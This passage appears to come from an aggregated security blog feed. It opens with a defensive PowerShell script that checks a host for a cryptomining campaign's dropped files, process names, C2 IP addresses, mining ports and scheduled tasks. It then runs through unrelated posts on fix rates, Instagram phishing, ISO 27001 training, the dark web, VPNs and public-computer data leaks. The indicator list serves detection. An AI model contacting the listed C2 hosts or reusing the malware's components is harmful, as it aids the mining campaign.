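    'C:\windows\debug\lsmos.exe',   'C:\windows\debug\lsmose.exe'
)

# Process names from kill.txt; the malware's own components overlap with this list.
$watchedProcessNames = @(
    'lsmose.exe', 'lsmos.exe', 'conime.exe', 'lsmosee.exe', '1.exe', 'lsazs.exe', 'tasksche.exe',
    'Zationa.exe', 'csrs.exe', 'svshpst.exe', 'Spoolvs.exe', 'svchsot.exe', 'xmrig.exe', 'srvany.exe',
    'WinSCV.exe', 'csrswz.exe', 'seser.exe', 'severxxs.exe', 'mssecsvc.exe', 'mssecsvr.exe', 'dsbws.exe'
)

# C2/payload hosts from the analysis and the ports the second sample checks for miner traffic.
$c2Addresses = @('45.58.135.106', '103.95.28.54', '103.213.246.23', '74.222.14.61', '174.128.248.10',
                 '213.183.45.201', '66.117.6.174', '213.183.60.7', '174.128.239.250', '173.208.139.170',
                 '74.222.1.38', '192.187.111.66')
$minerPorts  = @(3333, 5555, 7777, 14444, 14433)

function Find-DroppedFiles {
    foreach ($path in $droppedPaths) {
        if (Test-Path -LiteralPath $path) {
            $hash = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
            [pscustomobject]@{ Path = $path; Sha256 = $hash; MatchesIoc = ($iocHashes -contains $hash) }
        }
    }
}

function Find-WatchedProcesses {
    # Get-Process reports names without the extension; -contains compares case-insensitively.
    Get-Process | Where-Object { $watchedProcessNames -contains "$($_.ProcessName).exe" } |
        Select-Object Id, ProcessName, Path
}

function Find-SuspiciousConnections {
    # Established sessions to known hosts or mining ports, plus the listener the downloader opens.
    Get-NetTCPConnection -ErrorAction SilentlyContinue | Where-Object {
        ($_.State -eq 'Established' -and
            ($c2Addresses -contains $_.RemoteAddress -or $minerPorts -contains $_.RemotePort)) -or
        ($_.State -eq 'Listen' -and $_.LocalPort -eq 32381)
    } | Select-Object State, LocalPort, RemoteAddress, RemotePort, OwningProcess
}

function Find-PersistenceEntries {
    # "Mysa1" is the task the batch file creates; "sysupdater0" is the one the second sample removes.
    $tasks = Get-ScheduledTask | Where-Object {
        $_.TaskName -in @('Mysa1', 'sysupdater0') -or
        ($_.Actions | Where-Object { $_.Arguments -match 'item\.dat' })
    } | Select-Object TaskName, State,
        @{ Name = 'Action'; Expression = { ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; ' } }
    # The Mirai downloader points the host at 223.5.5.5 for DNS.
    $dns = Get-DnsClientServerAddress -AddressFamily IPv4 |
        Where-Object { $_.ServerAddresses -contains '223.5.5.5' } |
        Select-Object InterfaceAlias, ServerAddresses
    [pscustomobject]@{ ScheduledTasks = $tasks; RedirectedDns = $dns }
}

Find-DroppedFiles          | Format-Table -AutoSize
Find-WatchedProcesses      | Format-Table -AutoSize
Find-SuspiciousConnections | Format-Table -AutoSize
Find-PersistenceEntries    | Format-List
```

Because the second sample kills its own competitors on ports 3333, 5555 and 7777 and checks for connections on 14444 and 14433, those ports are included in the connection check even though the page does not name the pools behind them; treat a hit as a prompt to look at the owning process, which is returned in the output.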

 

Subject Matter Expert:

Priyanka Shinde, Goutam Tripathy, Vallabh Chole
Security Labs, Quick Heal Technologies, Ltd.

The post Miners snatching open source tools to strengthen their malevolent power! appeared first on Seqrite Blog.

TrustArc Partnering with IAPP to Benchmark Privacy Tech Adoption

As privacy tech continues to proliferate and embed itself in day-to-day privacy functions in the enterprise, the IAPP, together with TrustArc, seeks feedback to better understand how privacy pros are adopting the privacy tech tools outlined in our Privacy Tech Vendor Report. This year’s survey builds on a similar one we did last year looking at how privacy tools are acquired and deployed. Now, with obligations that both the EU General Data Protection Regulation (GDPR) and California Consumer Privacy Act (CCPA) are imposing on organizations, are we seeing a move toward greater tech adoption? The survey should only take about … Continue reading TrustArc Partnering with IAPP to Benchmark Privacy Tech Adoption

The post TrustArc Partnering with IAPP to Benchmark Privacy Tech Adoption appeared first on TrustArc Blog.

What Is Fix Rate, and Why Does It Matter?

Once your application security program is up and running, there are several metrics you can use to gauge your progress and optimize your program. For instance, companies typically measure their scan activity, flaw density, and policy compliance. However, very few include metrics for fix rate, despite the fact that it is an important indicator of a program’s success. Fix rate indicates how long it takes for a team to fix the vulnerabilities their scans find. Fix rate is calculated as follows:

Fix Rate = Fixed Flaws divided by (Fixed + Open Flaws)

Looking at fix rate over time measures the average velocity at which organizations are fixing flaws.

All the metrics mentioned above are important, but fix rate is especially critical. Ultimately, the most important function of an application security program is effectively fixing flaws once they are discovered. In the end, you can't scan your way to secure code.

What are the average fix rates?

For our most recent State of Software Security (SoSS) report, we analyzed the data compiled from the 700,000 scans we performed over a 12-month period between April 1, 2017 and March 31, 2018, and this reveals a pretty clear picture of the current state of fix rates.

When we look at the curve for the average fix velocity from the first day of discovery, we see that it takes organizations a troubling amount of time to address most of their flaws. One week after first discovery, organizations close out only about 15 percent of vulnerabilities. In the first month, that closure reaches just under 30 percent. By the three-month mark, organizations haven’t even made it halfway, closing only a little more than 45 percent of all flaws.

When we looked at fix rate by flaw type, we found that organizations are making a big push to fix their highest severity vulnerabilities first. Organizations managed to reach closure on 75 percent of these high-severity flaws more than 100 days sooner than the norm.

But the numbers aren’t so positive for other vulnerability rankings, such as exploitability or business criticality.
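The formula above and the fix-velocity curve it produces, worked through as an added example (not Veracode's code or data): given a list of flaw records with discovery and fix dates, as an AppSec team might export from a scanner, the functions below compute the fix rate as of a date, the share of flaws closed within 7, 30 and 90 days of discovery, and the per-severity breakdown. The six records are constructed for illustration.

```powershell
# Added example (not Veracode's code): compute fix rate and the fix-velocity curve from
# a list of flaw records.

# Constructed sample data: discovery date and, where closed, fix date for each flaw.
$flaws = @(
    [pscustomobject]@{ Id = 1; Severity = 'High';   Discovered = [datetime]'2019-01-01'; Fixed = [datetime]'2019-01-04' }
    [pscustomobject]@{ Id = 2; Severity = 'High';   Discovered = [datetime]'2019-01-01'; Fixed = [datetime]'2019-01-20' }
    [pscustomobject]@{ Id = 3; Severity = 'Medium'; Discovered = [datetime]'2019-01-02'; Fixed = [datetime]'2019-03-15' }
    [pscustomobject]@{ Id = 4; Severity = 'Medium'; Discovered = [datetime]'2019-01-03'; Fixed = $null }
    [pscustomobject]@{ Id = 5; Severity = 'Low';    Discovered = [datetime]'2019-01-05'; Fixed = $null }
    [pscustomobject]@{ Id = 6; Severity = 'Low';    Discovered = [datetime]'2019-01-10'; Fixed = [datetime]'2019-02-01' }
)

function Get-FixRate {
    # Fix Rate = Fixed / (Fixed + Open), counting only flaws already discovered by $AsOf.
    param([object[]]$Flaws, [datetime]$AsOf = (Get-Date))
    $known = @($Flaws | Where-Object { $_.Discovered -le $AsOf })
    if ($known.Count -eq 0) { return 0 }
    $fixed = @($known | Where-Object { $_.Fixed -and $_.Fixed -le $AsOf }).Count
    [math]::Round($fixed / $known.Count, 3)
}

function Get-FixVelocity {
    # Share of flaws closed within N days of their own discovery date, for each horizon.
    param([object[]]$Flaws, [int[]]$HorizonsInDays = @(7, 30, 90))
    foreach ($horizon in $HorizonsInDays) {
        $closed = @($Flaws | Where-Object {
            $_.Fixed -and ($_.Fixed - $_.Discovered).TotalDays -le $horizon
        }).Count
        [pscustomobject]@{ HorizonDays = $horizon; ClosedPercent = [math]::Round(100 * $closed / $Flaws.Count, 1) }
    }
}

function Get-FixRateBySeverity {
    # The per-severity view used above to see whether high-severity flaws close faster.
    param([object[]]$Flaws, [datetime]$AsOf = (Get-Date))
    $Flaws | Group-Object Severity | ForEach-Object {
        [pscustomobject]@{ Severity = $_.Name; FixRate = Get-FixRate -Flaws $_.Group -AsOf $AsOf }
    }
}

$asOf = [datetime]'2019-03-31'
Get-FixRate -Flaws $flaws -AsOf $asOf
Get-FixVelocity -Flaws $flaws | Format-Table -AutoSize
Get-FixRateBySeverity -Flaws $flaws -AsOf $asOf | Format-Table -AutoSize
```

Plotting Get-FixVelocity over a finer set of horizons gives the curve discussed above; swapping the Severity grouping for an exploitability or business-criticality field gives the other rankings the text says organizations track less well.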

Why are fix rates important?

Speed matters when it comes to application security. The time it takes for attackers to come up with exploits for newly discovered vulnerabilities is measured in hours or days. Letting known vulnerabilities linger unfixed dramatically increases your risk. For instance, it was merely days between disclosure and exploitation of the vulnerability in the Apache Struts framework that led to the Equifax breach.

In addition, it’s important to address the most high-risk vulnerabilities the fastest. Our SoSS stats surrounding fix rate by flaw type (mentioned above) are important here. The fact that most organizations are solely focused on fixing high-severity flaws, but have troubling fix rates for flaws that are highly exploitable or business critical is problematic. Oftentimes, a low-severity flaw could be just as risky, if not more so, than a higher-severity flaw. For example, a low-severity information leakage flaw could provide just the right amount of system knowledge an attacker needs to leverage a vulnerability that might otherwise be difficult to exploit.

How can we improve our fix rate?

Here are some ways to give your fix rate a boost:

Prioritize more

Reconsider your application security policy to ensure you are taking steps to reduce your most high-risk vulnerabilities the fastest. The sheer volume of open flaws within enterprise applications is too staggering to tackle at once -- which means that organizations need to find effective ways to prioritize which flaws they fix first.

For instance, not all apps are created equal, so create different requirements for different apps. An application that has IP, is public facing, and has third-party components may require all medium to very critical flaws to be fixed. A one-page temporary marketing site may only require high/very high flaws to be fixed.

In addition, consider a flaw’s exploitability, not just its severity. As noted above, some low-severity flaws could be highly exploitable, while some high-severity flaws would never be exploitable.

Scan more

This year’s State of Software Security report also revealed that those organizations that scan most frequently have the highest fix rates. Our data shows that there is a very strong correlation between how many times a year an organization scans and how quickly they address their vulnerabilities.

When apps are tested fewer than three times a year, flaws persist more than 3.5x longer than when organizations can bump that up to seven to 12 scans annually. Each step up in scan rate results in shorter and shorter flaw persistence intervals. Once organizations are scanning more than 300 times per year, they’re able to shorten flaw persistence 11.5x across the intervals compared to applications that are only scanned one to three times per year.

Prevent more

The fewer flaws you have to tackle, the faster you can tackle them. If developers have the secure coding skills needed to avoid introducing flaws in the first place, they will put a big dent in the work needed to fix flaws later in the cycle. But most developers have had zero training on secure coding – either in school or on the job. Our research has shown that when developers do get training or coaching on secure coding, the organization's fix rate gets a big boost. When our customers offer eLearning on secure coding for their development team, they improve their fix rate by 19 percent. When they take advantage of remediation coaching, they improve it by a whopping 88 percent.

Learn more

There’s more to AppSec than scanning. Get details in our new eBook, Application Security: Beyond Scanning.

Something’s Phishy With the Instagram “HotList”

Phishing scams have become incredibly popular these days. Cybercriminals have upped the ante with their tactics, making their phishing messages almost identical to the companies they attempt to spoof. We’ve all heard about phishing emails, SMiShing, and voice phishing, but cybercriminals are turning to social media for their schemes as well. Last week, the “Nasty List” phishing scam plagued Instagram users everywhere, leading victims to fake login pages as a means to steal their credentials. Now, cybercriminals are capitalizing on the success of the “Nasty List” campaign with a new Instagram phishing scam called “The HotList.”

This scam markets itself as a collection of pictures ranked according to attractiveness. Similar to the “Nasty List,” this scheme sends messages to victims through hacked accounts saying that the user has been spotted on this so-called “hot list.” The messages claim to have seen the recipient’s images on the profile @The_HotList_95. If the user goes to the profile and clicks the link in the bio, they are presented with what appears to be a legitimate Instagram login page. Users are tricked into entering their login credentials on the fake login pages, whose URL typically ends in .me domains. Once the cybercriminals acquire the victim’s login, they are able to use their account to further spread the campaign.

Images courtesy of Bleeping Computer. 

Luckily, there are steps users can take to help ensure that their Instagram account stays secure:

  • Be skeptical of messages from unknown users. If you receive a message from someone you don’t know, it’s best to ignore the message altogether or block the user. And if you think a friend’s social media account has been compromised, look out for spelling mistakes and grammatical errors in their message, which are common indicators of a potential scam at play.
  • Exercise caution when inspecting links sent to your messages. Always inspect a URL before you click on it. In the case of this scam, the URL that appears with the fake login page is clearly incorrect, as it ends in .me.
  • Reset your password. If your account was hacked by “The HotList” but you still have access to your account, reset your password to regain control of your page.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and 'Like' us on Facebook.

The post Something’s Phishy With the Instagram “HotList” appeared first on McAfee Blogs.

Facebook Braces for Multibillion Dollar Fine

Facebook announced that it was preparing for a massive fine from the Federal Trade Commission for its mishandling of user privacy. The fine could be as much as $5 billion.

The social media giant revealed the fine as a one-time expense in its annual earnings statement, explaining a 51% decline in income, “in connection with the inquiry of the FTC into our platform and user data practices.”

“We estimate that the range of loss in this matter is $3.0bn to $5.0bn,” the company’s statement explained. “The matter remains unresolved, and there can be no assurance as to the timing or the terms of any final outcome.”

Facebook has been the target of an FTC investigation to determine if it had violated a 2011 consent decree following the 2018 revelation that it improperly shared data with Cambridge Analytica.

Despite the size of the fine, the company showed continuous growth and an expansion of its ecosystem of apps.

Read more about the story here.

The post Facebook Braces for Multibillion Dollar Fine appeared first on Adam Levin.

ISO 27001 Lead Implementer, Lead Auditor and Internal Auditor – what’s the difference?

A version of this blog was originally published on 25 June 2018.

Anyone interested in getting into or advancing their career in cyber security probably knows that they will need training and qualifications. But given that the field is so broad, how are you supposed to decide which course is right for you?

This blog will help you make that decision. We take three of our most popular training courses – ISO27001 Certified ISMS Internal Auditor, ISO27001 Certified ISMS Lead Auditor and ISO27001 Certified ISMS Lead Implementer – and explain what they cover and who they are suitable for.

ISO 27001 Certified ISMS Lead Implementer

A lead implementer takes charge of an organisation’s ISO 27001 compliance project. They are responsible for the big decisions, such as setting out the ISMS’s scope, and for ensuring the Standard’s requirements have been addressed.

What you learn: The nine key steps involved in planning, implementing and maintaining an ISO 27001-compliant ISMS.

Who it’s for: This course should be attended by the person responsible for ISO 27001 compliance (typically the CISO) and the person leading the project (this might be the same person). You’ll need a solid understanding of ISO 27001’s risk assessment process, and should have already taken a foundation-level ISO 27001 course.

Length: Three days

ISO 27001 Certified ISMS Lead Auditor

A lead auditor can work internally or audit a second or third party’s ISMS. Their expertise is usually required when the organisation is seeking ISO 27001 certification, or if a partner organisation requests a supply chain audit.

What you learn: The first half of the course teaches you about auditing in general, and the second half covers best-practice advice for how to audit an ISMS.

Who it’s for: Anyone who wants the responsibility for implementing and maintaining their organisation’s ISMS. It’s also suitable for those who want to work for a specific auditing organisation, such as the BSI.

Length: Four and a half days

ISO 27001 Certified ISMS Internal Auditor

An internal auditor assesses the effectiveness of the organisation’s ISMS (information security management system) and whether it meets the requirements of ISO 27001, reporting their findings to senior management.

What you learn: The course begins with an introduction to ISO 27001 and how auditing fits into the compliance process, before explaining how to plan for and execute an internal audit.

Who it’s for: It’s ideal for compliance managers, but it’s obviously suitable for anyone interested in conducting internal audits. You should have a decent understanding of ISO 27001, but your main strengths should be in policy reviews.

Length: Two days

What are the differences between these courses?

Even though each of these courses covers similar areas, they are geared towards specific job roles. Take the internal and lead auditor courses as an example.

An internal auditor could be an employee within the organisation (hence ‘internal’), but they ideally wouldn’t have played a major role in the ISMS’s implementation. Otherwise they are being asked to find faults in their own work, which they might be reluctant to do.

Meanwhile, a lead auditor will have the specialist knowledge required to conduct second- or third-party audits. Although the tasks involved in these two roles are similar, the day-to-day work is very different. Whereas an internal auditor only has to be familiar with their organisation’s ISMS, a lead auditor that works for an auditing company deals with many organisations and interacts with even more people.

Then we come to the lead implementer course, which teaches you how to fulfil a completely different job role. Lead implementers are the heart of the team that puts the ISMS together. As with auditors, they need a strong understanding of ISO 27001’s compliance requirements, but their job focuses on how to meet those requirements, as opposed to reviewing whether they have been implemented correctly.

Of course, consultants will need to be implementation and auditing experts. They should therefore consider our ISO27001 Lead Implementer and Lead Auditor Combination Course, which covers everything you’d learn on each course separately. You’ll move straight from one topic to the other, helping you solidify your knowledge and understand how the two roles interact.

Interested in other ISO 27001 training courses?

These courses are just the beginning when it comes to ISO 27001 training, so if you’re not sure which course is right for you, why not take a look at IT Governance’s full range of training options?

With a variety of courses available in classroom, Live Online and distance learning format, we have you covered, whether you’re an information security beginner or looking for the right qualification to boost your career.

Find out more about our ISO 27001 training courses >>

The post ISO 27001 Lead Implementer, Lead Auditor and Internal Auditor – what’s the difference? appeared first on IT Governance Blog.

Privacy Shield Approaching Its 3 Year Anniversary in Operation

With data protection-related activity bustling around the world–from “Brexit” and GDPR enforcement to the approaching CCPA and exciting developments in the APAC region–it’s understandable to lose track of the EU-U.S. and Swiss-U.S. Privacy Shield Frameworks. What follows are responses to the most frequent Privacy Shield inquiries TrustArc is hearing from our customers. Is Privacy Shield Still Valid? Yes – in fact, Privacy Shield is fast approaching its three year anniversary on July 12th. Since its 2016 adoption, Privacy Shield has remained a sound, scalable and steady legal transfer mechanism for U.S. entities seeking to receive personal data from the EU … Continue reading Privacy Shield Approaching Its 3 Year Anniversary in Operation

The post Privacy Shield Approaching Its 3 Year Anniversary in Operation appeared first on TrustArc Blog.

The Cybersecurity Dangers of the Dark Web and How to Protect Your Organization

Even as its top marketplace, Dream Market, prepares to close its doors, the dark web continues to thrive. In fact, Darkode, one of the most well-known hacking forums and black markets, has recently reopened. And what are some of the most common wares at these underground markets? Organizational data, and the tools needed to get more. As long as the dark web exists, organizations must learn more about the threat it poses, and how to protect themselves.

A One Stop Shop for Cyber Attack Tools

There are any number of ways attackers can use the dark web to find what they need to attack an organization. One of the most common items is ransomware, which has become worryingly affordable. For less than $1000, anyone can buy a malware strain that can be used again and again. While individuals are frequently ransomed, organizations are naturally a much more lucrative target. In fact, ransoms for organizations are rapidly increasing, with the average payment per incident going from around $7,000 in the final quarter of 2018 to almost $13,000 in the first quarter of 2019. 

The marketplace isn’t limited to digital purchases. Interested parties can also buy physical means of attack like credit card skimmers or USB drives loaded with malware. Recently, a former student managed to destroy 59 computers at a small college in New York in a single evening using a “USB Killer,” a USB thumb drive that discharges electrical current to fry any device to which it is connected. Though the “USB Killer” is shockingly legal to buy, such an item or similar is also available on the dark web to those who don’t want their purchase to be tracked. Such physical items would be particularly effective in the hands of a malicious insider who has access to workstations and servers.

The dark web is also a refuge for those who are inexperienced in digital attacks. Thousands of fraud guides are available to those eager to learn more about many different types of attacks, such as phishing, brute force, or even simple account takeovers. These guides are incredibly cheap, typically costing only five to ten dollars. Hacking services are also readily available. The recently reopened Darkode, mentioned earlier, specializes in customized hacking jobs, as well as providing simpler services like renting a botnet to mount a DDoS attack.

An Underground Marketplace to Sell Your Breach Bounty

The goal for many types of malware is breaching systems to steal data. Attackers can utilize stolen credentials to use for themselves to commit identity fraud. However, oftentimes these breaches are so large that the amount of data stolen is more than an individual could use in a lifetime. Selling these credentials is even more lucrative than using the data for themselves. The dark web is the most natural and best place to sell these records. A hacker known as Gnosticsplayers has posted hundreds of millions of accounts for sale on the dark web, earning thousands of dollars in bitcoin.

Usernames and passwords are far from the only thing for sale. Entire identities are for sale on the dark web, from social security numbers to bank account numbers. For example, old tax returns stolen from accounting and legal firms are readily available for next to nothing. An old W2 can cost a few dollars or less, and it makes it possible to file fraudulent returns, open accounts, and run other identity scams.

Stolen information isn’t limited to human identities, either. Hackers are now trafficking in digital trust and machine identities as well, selling data like SSL and TLS certificates, which can be used to carry out a number of different types of attacks. The more types of data come up for sale, the less confidence organizations and users can have in the security of the internet at large.

Not for Sale: Keeping Data Off the Dark Marketplace

With seemingly endless ways to perpetrate attacks, and a ready-made spot to sell the bounty of these attacks, it’s easy to feel daunted by the task of putting up defenses. However, there are plenty of ways for your organization to prevent or remediate threats from the dark web.

Just as you keep locks on every door and window of your house, so should you protect every endpoint in your organization. While antivirus on workstations is routine, a high priority should also be placed on server-specific, native antivirus for your servers, since servers are the key storage areas that attackers and threat actors are eager to exploit. Internet of Things (IoT) devices are becoming commonplace in the workplace, but preventative security specific to such devices is difficult to find. Given the prevalence of botnets on the dark web, it’s critical to ensure that your smart devices are not part of such a network. Advanced threat detection solutions are the best way to find out if any IoT device, be it a tablet or an MRI machine, is infected with malware or being used for malicious purposes.

Insider threats should also be strongly considered when evaluating solutions. Insiders naturally have more access to data, and a simple purchase from the dark web could devastate an organization without proper monitoring and controls. Security solutions that enforce least privilege and detect anomalies within an organization can help defend against insider threats.

Monitoring can be provided by SIEM solutions, which filter numerous data sources and provide helpful insights through normalization and correlation. They can also identify suspicious behavior inside and outside of your organization through real-time updates, threat prioritization, and reducing the number of interfaces in need of monitoring.

Control can be achieved with identity and access management (IAM) solutions, which enable a robust approach to managing and governing access by applying the principle of least privilege: granting users only the access they need, when and how they need it. Employees require some access to complete their job, but not universal access, which can be all too tempting to exploit.

Finally, what better way to prevent being attacked than by thinking like the attackers? Penetration tests use ethical hacking to safely exploit security vulnerabilities, giving organizations insight and enabling remediation before an attack ever takes place. Regular penetration testing keeps organizations up to date on the latest strategies and tactics used by threat actors and the tools they offer on the dark web. Threat actors thrive in environments where individuals and organizations remain ignorant, hoping that fear will overwhelm them into inaction. Staying vigilant and being proactive about building a strong security portfolio that puts barriers around your data is the best way to keep your information safe in your databases, and off the dark web.


Antivirus vs. VPN: Do You Need Both?

Reading Time: ~3 min.

Public concern about online privacy and security is rising, and not without reason. High-profile data breaches make headlines almost daily, and tax season predictably increases instances of one of the most common types of identity theft, the fraudulent filing of tax returns known as tax-related identity theft.

As a result, more than half of global internet users are more concerned about their safety than they were a year ago. Over 80% in that same survey, conducted annually by the Center for International Governance Innovation, believe cybercriminals are to blame for their unease.

Individuals are right to wonder how much of their personally identifiable information (PII) has already leaked onto the dark web. Are there enough pieces of the puzzle to reconstruct their entire online identity?

Questions like these are leading those with a healthy amount of concern to evaluate their options for enhancing their cybersecurity. And one of the most common questions Webroot receives concerns the use of antivirus vs. a VPN.

Here we’ll explain what each does and why they work as complements to each other. Essentially, antivirus solutions keep malware and other cyber threats away from your devices, while VPNs cloak your data by encrypting it on its journey between your device and the network it’s communicating with. One works at the device level and the other at the network level.

Why You Need Device-Level Antivirus Security 

Antivirus software bears the primary responsibility for keeping your devices free from infection. By definition, malware is any software written for the purpose of doing damage. This is the category of threats attempting to undermine the antivirus (hopefully) installed on your PC, Mac, and yes, even smartphones like Apple and Android devices, too.

In an ever-shifting threat landscape, cybercriminals are constantly tweaking their approaches to getting your money and data. Banking Trojans designed specifically for lifting your financial details were among the most common examples we saw last year. Spyware known as keyloggers can surreptitiously surveil your keystrokes and use the data to steal passwords and PII. A new category of malware, known as cryptojackers, can even remotely hijack your computing power for its own purposes.

But the right anti-malware tool guarding your devices can protect against these changing threats. This means that a single errant click or downloaded file doesn’t spell disaster. 

“The amazing thing about cloud-based antivirus solutions,” says Webroot threat analyst Tyler Moffit, “is that even if we’ve never seen a threat before, we can categorize it in real time based on the way it behaves. If it’s determined to be malicious on any single device, we can alert our entire network of users almost instantaneously. From detection to protection in only a few minutes.” 

Why You Need Network-Level VPN Security 

We’ve covered devices, but what about that invisible beam of data traveling between your computer and the network it’s speaking to? That’s where the network-level protection offered by a VPN comes into play.

While convenient, public networks offering “free” WiFi can be a hotbed for criminal activity, precisely because they’re as easy for bad actors to access as they are for you and me. Packet sniffers, for instance, can be benign tools that help network admins troubleshoot issues. In the wrong hands, however, they can easily be used to monitor traffic on wireless networks. It’s also fairly easy, given the right technical abilities, for cybercriminals to compromise routers and mount man-in-the-middle attacks. Using this strategy, they’re able to commandeer routers in order to see and copy all traffic traveling between a device and the network they now control.

Even on home WiFi networks, where you might expect the protection of the internet service provider (ISP) you pay monthly, that same ISP may be snooping on your traffic with the intent to sell your data.

With a VPN protecting your connection, though, data including instant messages, login information, social media, and the rest is encrypted. Even were a cybercriminal able to peek at your traffic, it would be unintelligible.

“For things like checking account balances or paying bills online, an encrypted connection should be considered essential,” says Moffit. “Without a VPN, I wouldn’t even consider playing with such sensitive information on public networks.”  

How Webroot Can Help 

Comprehensive cybersecurity involves protecting both data and devices. Antivirus solutions that protect against known and unknown malware—like the kinds that can ruin a laptop, empty a bank account, or do a cybercriminal’s bidding from afar—are generally recognized as essential. But for complete protection, it’s best to pair your antivirus with a VPN—one that can shield your data from intrusions like ISP snooping, packet sniffers, and compromised routers.

Click the links for more information about Webroot SecureAnywhere® antivirus solutions and the Webroot® WiFi Security VPN app.

The post Antivirus vs. VPN: Do You Need Both? appeared first on Webroot Blog.

How important is it to test your cybersecurity incident response plan?

Estimated reading time: 2 minutes

With cybercrime incidents rising at an enormous rate, especially targeted attacks on organizations, many companies now have a cybersecurity incident response plan in place.

However, a major reason these organizations still fail to respond effectively to a cybersecurity incident is that, in spite of having an incident response plan, it is neither frequently tested nor consistently applied across the organization.

Given the ever-evolving nature of the threat landscape, it is extremely important to test the response plan frequently to check for loopholes in the process. Failure to update the plan often leaves organizations vulnerable and less prepared to handle the incident response process in the wake of a sudden cyber-attack.

The plan needs to be tested regularly, with effective investment in skilled resources, technologies and processes, so that all three work in sync when the need arises.

A few things that can help organizations test and implement an effective cybersecurity incident response plan include:

Automation

Investing in automation can be a good and cost-effective option in this regard, and can help organizations save millions of dollars that might otherwise be lost in the event of a breach.

Automation here refers to replacing or augmenting human intervention with artificial intelligence and machine learning, to enable easy and efficient identification of breaches and exploits so that necessary and timely actions can be taken.

Studies indicate that organizations that leverage automation extensively across their organization are in a better position to detect, prevent and respond to cyber-attacks and breaches than organizations that don’t.

Skilled Resources

The lack of enough skilled resources for handling cyber-attacks and managing the incident response plan is a big hurdle for organizations trying to achieve cyber resilience. The major problem lies not just in hiring resources but mostly in retaining cybersecurity professionals.

On the other hand, deploying too many processes and technologies at once to achieve cyber resilience can make the overall process too complex for cybersecurity personnel to understand and reduce the effectiveness of the plan.

Thus, what organizations need is close collaboration between technology, resources and processes, in order to effectively test and implement a robust cybersecurity incident response plan.

The post How important is it to test your cybersecurity incident response plan? appeared first on Seqrite Blog.

How do I buy a laptop with an encrypted hard drive?

Derek needs to find a laptop with Windows 10 Home’s device encryption to keep his data safe

I want to buy a new Windows 10 laptop for home use, and I want one with device encryption capability, so that the boot drive is encrypted. Until recently, this has only been possible with Windows Professional editions using BitLocker. I now see that if a laptop has the right specification, all versions of Windows 10 can have device encryption turned on.

The problem is that it’s difficult, if not impossible, to get information from mainstream laptop vendors as to whether a specific model supports device encryption. Recent MacBooks are capable of using FileVault and Apple spells out which models support it, so why is this information so hard to find for Windows laptops? Derek

I’m glad you asked because you’re right: there’s a shocking lack of information about device encryption on laptops, and this applies to Microsoft, to PC manufacturers, and to retailers. It’s also something that laptop PC reviewers rarely seem to mention, which makes it hard, if not impossible, to tell how many laptops are compatible with Windows 10’s device encryption.

Continue reading...

French Government App Shows Difficulties with Secure Communications

A messaging app released by the French government to secure internal communications has gotten off to a troubled start.

Tchap was released in beta earlier this month as a secure messaging app exclusively for government officials. Its development and release was made to address security concerns and data vulnerabilities in more widely used apps including WhatsApp and Telegram (a favorite of French Prime Minister Emmanuel Macron).

WhatsApp Meet “What Were You Thinking?”

Tchap was built with security in mind, and was initially touted as being “more secure than Telegram.” Man plans and God laughs. The app was hacked less than a day after its release. Elliot Alderson, the hacker who discovered the initial security vulnerability, subsequently found four more major flaws in its code, and confirmed with the app’s developer that no security audit was performed on the app prior to release.

DINSIC, the government agency responsible for Tchap, issued a press release stating that the software “will be subject to continuous improvement, both in terms of usability and security,” and has since announced a bug bounty for further vulnerabilities.

The French government’s attempt at creating a secure messaging alternative highlights a cybersecurity conundrum. Recent incidents, including the allegations of Chinese government “backdoors” in telecom giant Huawei’s hardware and confirmed NSA backdoors in Windows software, have left governments and businesses increasingly wary of using software or hardware developed abroad, or of storing data internationally. At the same time, development of in-house or “proprietary” solutions is significantly more resource-intensive and not necessarily more secure than the more widely used alternatives.


The post French Government App Shows Difficulties with Secure Communications appeared first on Adam Levin.

Notice: What Happens on Public Computers, Stays on Public Computers

Reading Time: ~4 min.

These are the places your digital tracks can be dug up. With a little sleuthing.

Experts have warned for years of the risks of using public computers such as those found in libraries, hotels, and airline lounges.

Many warnings focused on the potential for hackers to plant keystroke loggers, or intercept data as it flows across the internet. Indeed, in 2014, the National Cybersecurity and Communications Integration Center of the U.S. Secret Service issued an advisory for “owners, managers, and stakeholders in the hospitality industry” concerning data breaches. The text of the advisory claimed, “The attacks were not sophisticated, requiring little technical skill, and did not involve the exploit of vulnerabilities in browsers, operating systems or other software.” A 2014 announcement may seem to be an outdated reference, except that the recent Marriott data breach of over 300 million records was attributed to an attack in…wait for it…2014.

But spyware and keyloggers aren’t the most common threat to the users of business center and other public computers. Forgetfulness, operating systems, applications, and temporary files are high up on the list. For several years I have searched public computers, mostly at hotels, to see what kinds of information people have left behind. It’s been an interesting passion project, to say the least.

Uncovering a Very Public Digital Paper Trail

The first places I look are the documents, downloads, desktop, and pictures folders. The pictures folder typically yields the least interesting information, usually pictures of groups of drunken people, group gatherings at restaurants, weddings, or cats.

The desktop, document, and occasionally downloads folders are where most documents are inadvertently left behind. Some interesting samples I’ve discovered include a spreadsheet of faculty merit raises at a university in Texas, including the names of professors, their departments, their current salaries, and their projected raises. Another was the assignment of a chief officer to a ship belonging to one of the largest shipping companies in the world. It included the officer’s name, address, phone number, vessel name, date of assignment, and contact information.

I have come across corporate audits and strategic business plans. Recently, I discovered a document called “closing arguments” created by a district attorney. When possible, I contact the owners of the information to help them understand the risks of using public computers for sensitive work. I rarely hear back; however, the DA did thank me and assure me that the document was a training example.

The biggest menace, however, has been the temporary files folders, which include auto-saved documents and spreadsheets, as well as attachments. It is in the Temporary Internet Files folder that I have uncovered complete emails, and even a webpage including a bank statement detailing a large balance, the account holder’s name, sources of income, and the names and addresses of places he had done business. Of all of the temporary files I have discovered, documents belonging to businesses’ employees have been the most unsettling.

If you must, take precautions

There is some good news concerning the safety of public computers. Due to technology changes, I no longer find the contents of emails in the Temporary Internet Files folder. But we’re far from out of the woods. I have found my inbox cached, including pictures within emails and even a PDF that had not yet been opened.

Although I could not open emails in the temporary copy of my inbox shown above, subject lines and return email addresses may reveal more information than desired.

Deleting temporary internet files is a good habit, but there are multiple locations in which temporary files are stored. Documents edited on public computers remain of particular concern. Due to auto-save features, it’s possible to open a document on a thumb drive and leave auto-saved copies behind on the computer. In normal operating circumstances, with current operating systems and Office applications, this is not likely to happen. But errors like OS and application crashes will leave these copies behind. Microsoft Word and Excel will even proactively offer these auto-saved documents to the next user of these applications.

